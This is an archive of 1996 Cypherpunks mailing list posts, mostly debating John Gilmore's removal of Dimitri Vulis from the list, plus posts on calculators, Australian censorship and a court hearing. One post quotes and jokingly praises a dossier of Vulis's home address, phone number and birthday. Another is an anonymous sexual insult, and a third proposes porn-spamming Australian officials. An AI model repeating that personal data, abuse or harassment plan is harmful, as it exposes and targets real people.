 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 5 Nov 1996, Dave Crocker wrote:

> 	Actually I think that this view is at the core of the
> misunderstanding.
> 
> 	In fact, we ARE required to suffer fools.

What you mean WE, white man?  Does this "requirement" include 
John Gilmore?  Must he and his machine be held in hostage to 
the gratuitous flames of Dimitri?  I think not.

> It is a clear and acknowledged expense for an open society.
 
Clear and acknowledged by whom?  Certainly not me.  We are not
talking about Dimitri's right to speak in open society.  This is
a private list provided through the generosity of one person.
Please refrain from making arguments that tacitly assume that
toad.com is a public good or has somehow been nationalized "in
the public interest."  

I challenge those who think John's actions were intemperate or
ill-advised to make their arguments without rewriting history or 
the facts, or by making use of poorly thought out metaphors.

This IS a private list, like it or not.  Crying "censorship" or
"authoritarianism" merely because John handled this differently
than you would have, is disingenuous to say the least.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 6 Nov 1996 09:56:55 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT]
In-Reply-To: <328029BC.559B@gte.net>
Message-ID: <Pine.SUN.3.91.961106091938.3111C-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 5 Nov 1996, Dale Thorn wrote:

> My computer and my access to cypherpunks is not inside of
> anyone's home.

Dale is wrong.  All access to Cypherpunks is via toad.com which 
sits in John Gilmore's home.  (The basement office to be exact.)

> Here, John has opened up whatever computer hardware for an
> essentially public forum...that it is perceived by a very
> large segment of the subscribers as public...

And here John has chosen to limit said forum.  It is irrelevant
how many subscribers perceive the list as public.  It is private.
Their misperception is in no way binding on John.

> Now, don't you think it odd that if people really perceived
> this forum to be "really private", that they would so strongly
> object to this ousting, particularly of the person in question,
> who is not even liked by these objectors?

a) "Against stupidity, the gods themselve, contend in vain."
   Some folks just don't have a clue.  Just because they don't
   understand the nature of John's contribution, does not stop
   them from yammering.

b) There are those who do understand the private nature of the
   list, but think that John has made a mistake.  They may
   certainly try to convince him of the error of his ways without
   assuming the list is public.

> You can argue until doomsday the "privacy of home" issue,...

Since it is correct and unasailable, I believe I will.

> If you really agree with the ousting, I don't understand why
> you're arguing so hard for the "private home" issue; would you
> want to see a world someday where all Internet communications
> are "controlled" by "private" individuals at "home"?

Yes.  That's the way it is now, and I think it works very well.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Craft <jsi@idiom.com>
Date: Wed, 6 Nov 1996 10:03:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Parents effectively lose their right
In-Reply-To: <19961106.073225.9807.2.kb4vwa@juno.com>
Message-ID: <199611061803.KAA24421@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Family Research Council Washington Watch News - October 25, 1996 - Vol.
> 8:1
> 
> "Parents effectively lose their right to direct the upbringing of their
> children when they drop them off at school, according to one federal
> court judge.  Earlier this year, Judge Melinda Harmon, appointed by
> President Bush, ruled that Katy Independent School District in TX did
> not violate parents' rights by allowing Child Protective Services to 
> interrogate a student without notifying his parents, nor by instructing 
> him to lie to his parents about the incident."

Spanking and ecumenical prayer may be illegal in the schools, but 
methinks the above is actually more harmful to society than mindless
prayer or a little paddling.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 6 Nov 1996 10:01:53 -0800 (PST)
To: CYPHERPUNKS@toad.com
Subject: Re: FW: Now we have it all
In-Reply-To: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961106104748Z-3821@csa-ntx.chemson.com>
Message-ID: <v03007803aea6832113aa@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM +0100 11/6/96, Butler, Scott wrote:
>>
>Abaddon wrote:
>
>>>susbscribe
>
>Surely we have seen it all now.
>I find it hard to believe that a word like
>suscribe....subsribe....subcribes..
>SUBSCRIBE..is so difficult to spell correctly.
>
>:-)

This is actually steganography. Various spellings of "subscribe" are being
used to communicate a bit or two per message.

Actually, the practice becomes a code, as in:

"Suscrive if by sea, sudcribe if by land."


--Klaus! von Future Prime








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Craft <jsi@idiom.com>
Date: Wed, 6 Nov 1996 10:10:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship in Western Australia
In-Reply-To: <1.5.4.32.19961106083312.003babac@popd.ix.netcom.com>
Message-ID: <199611061809.KAA24807@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


> >> AUSTRALIA - CENSORS STRIKE AT INTERNET, LANS - Western Australia's
>    State Government says it will seek to censor all computer
>    transmissions of offensive material after its censorship act came
>    into force last Friday. [Newsbytes, 67 words]

Time to post hardcore porn binaries in aus.culture

Know some Australian government e-mail addresses?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 6 Nov 1996 07:37:05 -0800 (PST)
To: Dale Thorn <snow@smoke.suba.com>
Subject: Re: Censorship on cypherpunks
Message-ID: <3.0b19.32.19961106104133.0071ef3c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:51 AM 11/6/96 -0800, Dale Thorn wrote:
>As I've said before, all forums on the net can be arranged at some point
in the future
>to be "privately" owned, and the question is, can there be a free speech
forum where
>you won't be arbitrarily banned?
>

We call it Usenet.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Scott" <SButler@chemson.com>
Date: Wed, 6 Nov 1996 02:44:52 -0800 (PST)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=CYPHERPUNKS+40TOAD+2ECOM+3B@chemson.com>
Subject: FW: Now we have it all
Message-ID: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961106104748Z-3821@csa-ntx.chemson.com>
MIME-Version: 1.0
Content-Type: text/plain



>
Abaddon wrote:

>>susbscribe

Surely we have seen it all now.
I find it hard to believe that a word like
suscribe....subsribe....subcribes..
SUBSCRIBE..is so difficult to spell correctly.

:-)
ScOtT





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 6 Nov 1996 10:49:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Sliderules, Logs, and Prodigies
In-Reply-To: <199611052244.OAA15345@toad.com>
Message-ID: <v03007806aea68cf963af@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




(Someone renamed my thread with the "[noise]" prefix. I have removed this
stupid prefix. Anything people think really is just noise should not even
be posted. I favor picking descriptive thread names, and try to do it
whenever I can, rather than cluttering up thread names with cutesy labels.)

At 2:44 PM -0800 11/5/96, Sean Roach wrote:

>If I remember my history right, the order that math was done often depended
>on the model of calculator it was done on.  I remember being warned as late
>as 1991 how some calculators may still still add before they multiply, and
>to use those parenthesis for good measure, just to be safe.

Well, it ain't _history_ only--it's also current. Some of us use RPN
(Reverse Polish Notation) calculators exclusively. (Even my screen
calculator I use on my Mac is an RPN one.)

The main split is between RPN and algebraic. Algebraic calculators use
parentheses to establish operator precedence and to alter precedence, RPN
calculators do not.

(Yes, purists will note, advanced RPN calculators have options for
parentheses, brackets, and other similar things, and can even process
algebraically. But not in the basic models, and the RPN computational
model, being stack-based, does not require them.)

To see how RPN works, visit any electronics store that carries
Hewlett-Packard calculators, especially the advanced ones like the H-P 48,
and read the first 5 pages of the instruction manual. It will all become
clear to you.



--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Nov 1996 11:50:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis
In-Reply-To: <Pine.SUN.3.91.961105143024.24101B-100000@crl.crl.com>
Message-ID: <5VcZwD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort <sandfort@crl.com> writes:

> Intellectual honesty isn't required on this list, but it is
> appreciated.

I wouldn't hold my breath waiting for John Gilmore to unsubscrive[sic]
himself for intellectual dishonesty... :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 6 Nov 1996 08:48:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: CLA_sh0
Message-ID: <1.5.4.32.19961106164659.006a5258@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Vigorous Cypherpunk debate on its purpose and future may be
   a harbinger of global conflict. A book review today on
   global conflict and six related essays in November
   Foreign Affairs may provide illumination -- both for
   Cypherpunk's crypto-mission and for its intramural clashes.
   (See Lewis Koch's inquest of global CP disputes.)

   11-6-96. NYP:

   "A Scholar's Prophecy: Global Cultural Conflict." Book
   review.

      With the end of the cold war, the division of the world
      into ideological camps and political networks has
      yielded to the basic human propensity to find meaning
      and identity in cultural commonality -- in blood,
      religion, heritage and birthright. After four centuries
      of Western domination, global politics will now become
      a complicated and deadly earnest contest among the
      world's major civilizations, mainly the Western one, the
      Islamic one, and the Sinic one deriving from China.
      Unless the West recognizes the power of cultural
      conflict, it could perish from ignorance, overconfidence
      and complacency.

   -----

   http://jya.com/clash0.txt

   CLA_sh0

----------

   The Foreign Affairs essays:

      http://jya.com/clashidx.htm 

   (The URL is the index of the six; Huntington's is ready;
   others follow.)

   Abstracts:

   The West: Unique, Not Universal, Samuel P. Huntington

      Many in the West believe the world is moving toward a
      single, global culture that is basically Western. This
      belief is arrogant, false, and dangerous. The spread of
      Western consumer goods is not the spread of Western
      culture. Drinking CocaCola makes a Russian no more
      Western than eating sushi makes an American Japanese.
      The essence of the West is the Magna Carta, not the
      Magna Mac. As countries modernize, they may westernize
      in superficial ways, but not in the most important
      measures of culture language, religion, values. In fact,
      as countries modernize they seek refuge from the modern
      world in their traditional, parochial cultures and
      religions. Around the globe, education and democracy are
      leading to "indigenization." And as the power of the
      West ebbs, "the rest" will become more and more
      assertive. For the West to survive as a vibrant and
      powerful civilization, it must abandon the pretense of
      universality and close ranks. Its future depends on its
      unity. The peoples of the West must hang together, or
      they will hang separately.

   Democracy and the National Interest, Strobe Talbott

      Democracy makes good neighbors, and in an increasingly
      interconnected world the United States has both the
      means and the motive to promote the democratic process
      abroad. On the home front, Americans crave a foreign
      policy grounded, like their nation, in idealpolitik as
      well as realpolitik. The administration has made support
      of nascent democracies a priority of its diplomacy from
      Latin America to East Asia, and the returns from South
      Africa, Haiti, Russia, even Bosnia seem positive. But
      democratization is a long, hard journey in which
      elections are only the first step. The United States
      should encourage new democratic governments through
      their most fragile phase.

   Defense in an Age of Hope, William J. Perry

      Twice before, America had the opportunity to make the
      prevention of conflict its first line of defense. It
      must not lose this moment after the Cold War to foment
      a revolution in security strategy. Preventing
      proliferation is key, and U.S. programs help turn Soviet
      missile sites into sunflower fields. The American armed
      services the world's most emulated, show other
      militaries how to function in a civil society and
      conduct exchanges that head off misunderstandings. In
      Europe, George Marshall's fondest hopes are being
      realized through the Partnership for Peace which
      reverberates well beyond the security realm. Meanwhile,
      the United States leverages forces for maximum
      deterrence and invests in smart technology. But its best
      investment is in openness and trust, the essential tools
      of the art of peace.

   Germany's New Right, Jacob Heilbrunn

      Not skinheads in jackboots but journalists, novelists,
      professors, and young businessmen constitute the German
      new right. Since the fall of the Berlin Wall, they have
      sought the "normalization" of German history, a revival
      of nationalism, and recognition that Germany is the most
      powerful country in Europe. When confronted with the
      Nazi past, they talk about Stalin's crimes and complain
      of an oppressive "political correctness." Violence
      against immigrants is answered with complaints of
      attacks against Germans. Though not a political
      movement, the new right is extending the boundaries of
      the politically acceptable.

   Banning Ballistic Missiles, Alton Frye

      Heady years for arms control make a superpower
      complacent. The structure of restraint accepted by
      Washington and Moscow could crack; meanwhile,
      proliferation continues apace and nuclear materials
      trickle onto the world market. The Clinton team has
      followed through on the work of past negotiators, but it
      is high time for a third START. The United States should
      propose the dramatic steps of placing nuclear warheads
      in "strategic escrow" and banning ballistic missiles.
      Advanced monitoring and inspection technologies make the
      plan practicable, and there will be security payoffs for
      all.

   Is the World Ready for Free Trade?, Charles R. Carlisle

      Though a leap to global free trade is a nice idea, the
      political support is just not there. Nor is any such
      earthshaking step necessary. The World Trade
      Organization has an extensive built-in agenda that
      should not be derailed. Fears of regionalism are greatly
      exaggerated, since regional trade has not increased much
      since the early 1970S and current plans for free trade
      in the Americas and the Pacific are unlikely to succeed.
      Few countries share the free-trade faith of the United
      States and Great Britain, and even in those places,
      economic anxiety threatens to push trade in the other
      direction.

   -----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 6 Nov 1996 11:51:06 -0800 (PST)
To: cypherpunks, cypherpunks-announce, gnu
Subject: Bernstein hearing, Nov 8 CANCELED!
Message-ID: <199611061951.LAA13910@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Judge Patel has decided that she already knows enough, based on the
papers submitted by both sides, to decide our motion for a preliminary
injunction to protect Dan Bernstein as he teaches a class on
cryptography in January.

She also says that she will decide our motion for partial summary
judgement (from the September 20th hearing) at the same time.

So, THERE WILL BE NO HEARING ON NOVEMBER 8TH!  DON'T COME, WE WON'T BE THERE.

Apologies for the short notice.  It's all the notice the legal team
got.

I'll let you know as soon as she releases her decision.

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Wed, 6 Nov 1996 11:58:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: [PRIVACY][BLACKNET] Potential Analyst?
Message-ID: <199611061957.LAA03299@well.com>
MIME-Version: 1.0
Content-Type: text/plain



>Dimitri Vulis
>#4k Burns St, Forest Hills,NY 11375-3506
>(718)261-6839
>Source: http://www.yahoo.com (Four11 people search)

>Birthday: December 29
>Source: http://www.boutell.com/birthday.cgi/december/29

>D&M Consulting Services (DM-DOM)
>   67-67 Burns Street
>   Forest Hills, NY 11375
>   Domain Name: DM.COM
>   Administrative Contact:
>      Administration, PSINet Domain  (PDA4)  
>psinet-domain-admin@PSI.COM
>      (703) 904-4100
>   Technical Contact, Zone Contact:
>      Network Information and Support Center  (PSI-NISC)  
>hostinfo@psi.com
>      (518) 283-8860
>   Record last updated on 31-Oct-96.
>   Record created on 19-Jun-91.
>   Domain servers in listed order:
>   NS.PSI.NET                   192.33.4.10
>   NS2.PSI.NET                  38.8.50.2
> Source: InterNIC


The Pro's say that analysts are born not made. If so whoever wrote
this appears to show potential.....

Send resume to BLACKNET.....

;)

Brian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Wed, 6 Nov 1996 12:12:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: [noise] Re: Any Info for Sen. Pressler....
Message-ID: <199611062010.MAA14464@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Per Bill Stewart's comment.
...
>At this point, I think he's now Ex-Senator Pressler,
>if I saw the election returns I think I saw.
...
Actually he would be a lame duck.  Our elected officials don't take office
the moment the returns come in.  He has a little while left.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Wed, 6 Nov 1996 12:10:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: [pure noise] filtering Re: "censorship in cyberspace"???
Message-ID: <199611062010.MAA14479@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:29 PM 11/5/96 -0800, Vladimir Z. Nuri wrote:
...
>the "automatic prose generator" technology out there leaves a lot
>of other interesting ideas. an ingenious software engineer
>with a flair for writing could create some pretty sophisticated
>grammars that automatically generate text yet are impossible
>to detect over perhaps even dozens of messages output by them.
>they could even have their own personalities and writing styles,
>if the software engineer were creative and devious enough.
...
Consider, however, that when computers match humans in the ability to
generate coherent sentences, they might have something useful to say.  Even
now, search, engine designers are fighting with "web spam" artists who fill
thier pages with various "key" words or statements to ensnare hapless
browsers.  These designers are developing filtering systems to combat this,
and these filters could conceivably be ported to the e-mail community to
filter machine generated text.  There should be a point where the prose spun
by asimov's "positronic brains" and that woven by a humans own "natural"
brain would be indistingushable.  At this point, we might want to hear their
opinions, for they should be as valid as any other.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair" (Time Keeper) <fair@clock.org>
Date: Wed, 6 Nov 1996 12:14:22 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: "censorship in cyberspace"???
In-Reply-To: <199611052329.PAA15991@netcom22.netcom.com>
Message-ID: <v0300780aaea6a1002b06@[198.68.110.2]>
MIME-Version: 1.0
Content-Type: text/plain


Simple enough to solve:

1. all E-mail messages must be crypto-signed by the author's private key.

2. the list exploder verifies the key against the list membership, and only
forwards the message to the distribution list if the signature matches a
member of the list.

3. New members are added through invitation or introduction (hand wave).

Q.E.D.

There are, of course, some technology integration and ease-of-use issues
here, given that no commonly used commercial E-mail software will do #1.

	Erik






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: furballs <furballs@netcom.com>
Date: Wed, 6 Nov 1996 13:28:27 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Censorship on cypherpunks
In-Reply-To: <BP3ywD23w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9611061214.A13085-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> furballs <furballs@netcom.com> writes:
> > As for the original point on Vulis:
> >
> > John Gimore did what he did. Vulis challenged him, and John called his
> > bluff. Having read this list for quite a while now, I've seen alot of
> > crap go back and forth from many people that was just as annoying as what
> > Vulis was doing.
> 
> I'm slightly offended by this.  What if someone were to post the entire text
> of the _Pink _Swastika to this mailing list, in 40K chunks, with the subject
> header "John Gilmore and Hitler's rise to power"? :-)
> 

You missed the original point. Posting spam is one thing; directly 
challenging the list owner to stop you from posting is another matter.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Wed, 6 Nov 1996 09:52:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis
In-Reply-To: <961106.070903.3l3.rnr.w165w@sendai.scytale.com>
Message-ID: <9611061758.AA10058@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>> Laws create rights      - argument in "is"
>
>This is way too broad.  The only "rights" laws can _create_ are the
>zero-sum rights of entitlement that impose a corresponding
>responsibility on others.  Natural rights can't be created by fiat.

If you look at the original argument you will see that I'm explicitly
denying the existence of Natural law. It has been recognised as a
bankrupt philosophical position for at least two centuries.

Its not even the basis for Libertarian argument which is principaly
contractarian. 

The change in the wording of the declaration of Independence from
"God Given" to "Self Evident" reflects the wider philosophical
movement of the time. After Rousseau there was no need to depend on
superstition as the foundation of ethics.

If you argue from "natural law" you are simply parrotting the
predjudices of society. It isn't philosophy, its more akin to the
religious bigotry popular in the US South and Afghanistan. 


		Phill
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 6 Nov 1996 13:16:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: [URGENT] Diffie-Hellman
Message-ID: <199611062059.MAA24669@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May's 16Kb brain's single convolution is 
directly wired to his rectum for input and his T1 mouth 
for output. That's 16K bits, not bytes. Anal 
intercourse has caused extensive brain damage.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Wed, 6 Nov 1996 13:05:07 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Compromise proposal
Message-ID: <199611062104.NAA07305@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov wrote:
> Dave Hayes wrote:
> > Improving signal to noise is a laughable goal at a social event of
> > more than 100 people, why do people insist upon trying it on the net?
> To save time?

At the expense of honor?
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

An eye for eye only ends up making the whole world blind.        --  Gandhi






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 6 Nov 1996 10:21:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9611061808.AA14306@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Nov 1996 stewarts@ix.netcom.com wrote:

> Headline:
> >> AUSTRALIA - CENSORS STRIKE AT INTERNET, LANS - Western Australia's
>    State Government says it will seek to censor all computer
>    transmissions of offensive material after its censorship act came
>    into force last Friday. [Newsbytes, 67 words]
> 
> Probably not as competent as Singapore at enforcement,
> but what do people know about it?

I'll check with the Aus EFA and get back to you on the above. Hmmm, I 
wonder if a home user with a networked computer in say his lounge and 
another in his study will be guilty of a crime if he sends an electronic 
(and offensive) message to that other node!

Press 'N' now if your not interested in a tounge in cheek brief on 
Australian politics this week...

Action such as the above by WA would not suprise me it..of course its been 
tried before and defeated but that doesn't stop our political thugs here, 
they just put it on the backburner for a year and try again until people 
get tired of responding and pass it by default. Hell last week a federal 
member from WA spent 20 minutes ranting in parliament why all domestic 
cats (and feral cats) in Australia should be destroyed (Pussy Hater) 
whilst Australia's economy continues to slide, manufacturing moves 
offshore and our already record unemployment continues to rise.

Semi-auto firearms were banned here this month (even though the Prime 
Minister stated earlier that he knew it wouldn't solve 'The Problem'), 
including semi-auto shotguns. All other firearms are now hard to obtain 
(must show a valid _reason_ for obtaining a permit for each individual 
firearm, including air rifles - note the protection of ones life is not a 
reason..its specifically excluded in the legislation); double edged knives 
are now a prohibited import. [Note: sling shots are already banned so 
that leaves just spears, bows and stones to be legislated against and 
Australia will be projectile-weapon free]. A local member was asked if 
police would still be carrying guns now that The Problem was solved and 
he responded with..no, there's still dangerous criminals out there; 
without realising the irony of his statement. Hmmmmm.

This morning I read in the paper that my local city council is going to 
pass a regulation that will enable them to gas my cat (Lots of Pussy 
Haters here) if it eats a bird, 'strays' off my property, or generally 
has the nerve to make itself noticed. There is talk of banning 'protection' 
type dog breeds after an old women was killed recently, supposedly by a 
Rotty.

A police sgt told a WA poliscum that a stolen car incident he 
investigated 3 weeks ago could only have been done by criminals using 
information obtained from the internet (yeah thats how ALL the crims 
learn hotwiring). This was then reported to the WA parliament as factual.

Meanwhile our Foreign Minister (the same intellectual giant that 
recently spoke to the CEO of the US Reserve bank then spilled 
his guts to the press about the US Reserve Banks' intentions wrt interest 
rates - and awoke the next morning and found, much to his suprise, a bit 
of a market ruffle in full swing) today made a commitment to the UN that 
we would be taking steps with respect to multi-culturalism and native 
reconciliation, like some arse-licker at the international-cocktail 
party. Well at least it's now clear he is answerable to the UN for 
domestic policy.

Our PM (Little Johnny 'flaK jacket' Howard) made a statement recently that 
his election would usher in a new era of free speech, however, now 
that an independant member with apparantly substantial grass roots support 
suggests politically incorrect things like reducing immigration, cutting 
the 50 hours a week child care for unemployed stay at home single mothers 
and the billions spent on ineffective aboriginal bodies all of parliament 
wants her to shut up. She has received death threats from Vietnamise drug 
gangs for expressing these views but she should be OK now because firearms 
are illegal.

This week a recently retired Supreme Court Judge was named in parliament
was named in parliament (under parliamentary privelege) as 
receiving favoured treatment by a commission investigating child sex 
charges. Apparantly the shock was so severe that he was forced to commit 
suicide that very night after insisting his innocence. The government 
side called for her dismissal (seemingly not because he was named but 
because he chose to kill himself) and suggested limitations on parliamentary 
speech. The good judge must not have had enough faith in his own legal 
system to trust his reputation to it and face a court of law. Police are 
also under investigation on child sex charges by that same body.

Now you point out that if I say fuck here (Ooops thats illegal now) I can 
expect armed thugs kicking down my door to drag me back to WA for trial.
I guess anyone state side better cancel any plans to visit our little 
autocracy here now, especially John, after all the message is being bounced 
into WA from his computer and if the legislation is like the laughable bill 
that was attempted to be introduced into New South Wales earlier this year 
he'll be in big trouble (i know this will come as a frightening shock to 
him).

I better go find myself a good throwing rock, I think I here the sound of 
jack-boots on my path.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 6 Nov 1996 13:38:44 -0800 (PST)
To: wb8foz@apk.net
Subject: Re: Exon's Seat Lost
In-Reply-To: <199611061343.IAA13821@wauug.erols.com>
Message-ID: <Pine.SUN.3.91.961106133817.24084C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Yes. Check out my column today at http://netlynews.com/

-Declan

On Wed, 6 Nov 1996, David Lesher / hated by RBOC's in 5 states wrote:

> Duncan Frissell sez:
> > 
> > Exon's seat goes to Republicans (according to ABC).  CDA probably not involved.
> 
> Did I not hear Pressler lost?
> 
> 
> -- 
> A host is a host from coast to coast.................wb8foz@nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 6 Nov 1996 11:38:12 -0800 (PST)
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Censorship on cypherpunks
In-Reply-To: <3280A5D9.35E8@gte.net>
Message-ID: <199611061955.NAA12955@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> snow wrote:
> > > > It's only authoritarianism if the government is involved.
> > > > Clearly, the government isn't involved in this matter.
> [snippo]
> > fans of his team. Screaming at the top of his lungs about the quarterback
> > for a totally different team fumbling the ball in the 1970 world series.
> [snip, snip]
> A vastly more accurate analogy is that the "Doctor" is not in fact inside of the bar,
> as none of the cypherpunks are inside of anyone's home but their own.  Vulis is some-
> where else, sending his brand of beer to the bar in competition with a number of
> other "vendors".  Customers and vendors alike complain that Vulis' bottles have
> offensive portraits on them, possibly famous sports figures in an unflattering light.

     Side note: Could you please set your mail reader to format messages 
to < 80 columns? I, and I assume several others here use Unix CLI based mail
readers that wrap your text weirdly.

> So the bar owner bans Vulis' beer, but he sends it in anyway through a third party,
> and several patrons discover that they can easily remove the outer label from the
> bottle and see the original portraits.

      He isn't "putting different labels" on his horse piss, he can still 
post under his own name. 

     Your analogy makes no sense. 

> There are similarities to Prohibition here.
> Now the bar owner, being the owner, can throw out anyone he wants to anytime, and he
> gets away with this with little or no trouble lawsuit-wise, since the courts are much
> more lenient with owners of bars and rock-n-roll venues that with, say, Denny's
> Restaurants.

     Not really. Any establishment has the rights (and in some cases the 
responcibility) to remove patrons for their _actions_. If you go into dennys 
and act like a total ass, abusing other patrons, and daring the Management to
throw you out, you will most likely be eating at McD's. 

     Bar and Club owners probably do have more latitude to pick and choose
who they allow _in_ to their establishment, but both have the right to eject
patrons who start shit. 
 
> As I've said before, all forums on the net can be arranged at some point in the future
> to be "privately" owned, and the question is, can there be a free speech forum where
> you won't be arbitrarily banned?

     Yes. You start your own forum. When Perry was looking for a home for a 
new list, I offered a machine that I have up as a server, it is already running
a mailing list that offer to a certain group, on that list I have very 
few rules, but they are enforced. Outside of 2 areas, anything can be discussed.I put those 2 areas (Politics and Non-subject related Commercial posts) off 
limits to keep traffic down. When one of the users and I started to get into
politics, I noted the problem (It had been over a year since I had put the 
rules into place, and I even forgot--it never came up) and started another 
list (which promptly fell over and died) for that express purpose. 

     I and not a rocket scientist, but maintaining a low use unix server and 
majordomo are not that difficult (I wouldn't want to deal with a list the 
size of CP, but that is a different matter), and 
----------------Here is the big point--------------------------
as long as you have access to A PRESS of any kind, you are not being censored. 

     Vulis is probably much more intelligent than I, hell I couldn't get a 
masters in Math, much less a Piled Higher and Deeper. He probably makesa a 
good deal more money than I do, so he shouldn't have much difficulty setting
up his own server, with it's own web site, remailer, and Mailing list in 
competetion with this one. 

     Let him start his own bar as Mr. Metzger is doing. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 6 Nov 1996 14:11:38 -0800 (PST)
To: cypherpunks@toad.com
